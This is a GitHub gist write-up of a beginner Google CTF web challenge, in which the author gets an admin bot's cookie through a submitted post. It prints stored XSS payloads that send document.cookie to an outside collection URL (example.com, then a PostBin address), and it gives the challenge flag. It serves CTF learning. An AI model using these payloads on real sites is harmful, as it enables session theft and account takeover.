Skip to content

Instantly share code, notes, and snippets.

@v1dhun

v1dhun/wirteup.md Secret

Created November 25, 2020 10:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save v1dhun/048ae3ba1fe8c7ac5784737fca42563a to your computer and use it in GitHub Desktop.
Save v1dhun/048ae3ba1fe8c7ac5784737fca42563a to your computer and use it in GitHub Desktop.
Download ZIP
GOOGLE CTF Wirteup of government agriculture network
Raw
wirteup.md

Government Agriculture Network

  • TASK : WEB
  • TYPE : Beginners

LET FIND THE FL4G!

Started with the URL , got from the description . The link going to a webpage titled as Ministry of Agriculture with some images and a form that allows us to create a post . When submitting the post, webpage response is Your post was submitted for review. Administator will take a look shortly.So admin is alive :)

When the admin link checks it's redirect to home [ location="/" ]

THEN CHECK THE FORM

  • I had used a XSS trick , It execute an attack to steal cookies from admin.
<script>
 location.href = 'example.com?c00k13='+document.cookie;
</script>
  • I had used PostBin as href link
  • Then the final payload looks like
<script>
 location.href = 'https://postb.in/1561447806433-7096075240988?c00k13='+document.cookie;
</script>

IMG0X01

  • After submitting the post
  • Then got response from server

  • Finally found our FL4G

FL4G IS CTF{8aaa2f34b392b415601804c2f5f0f24e}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment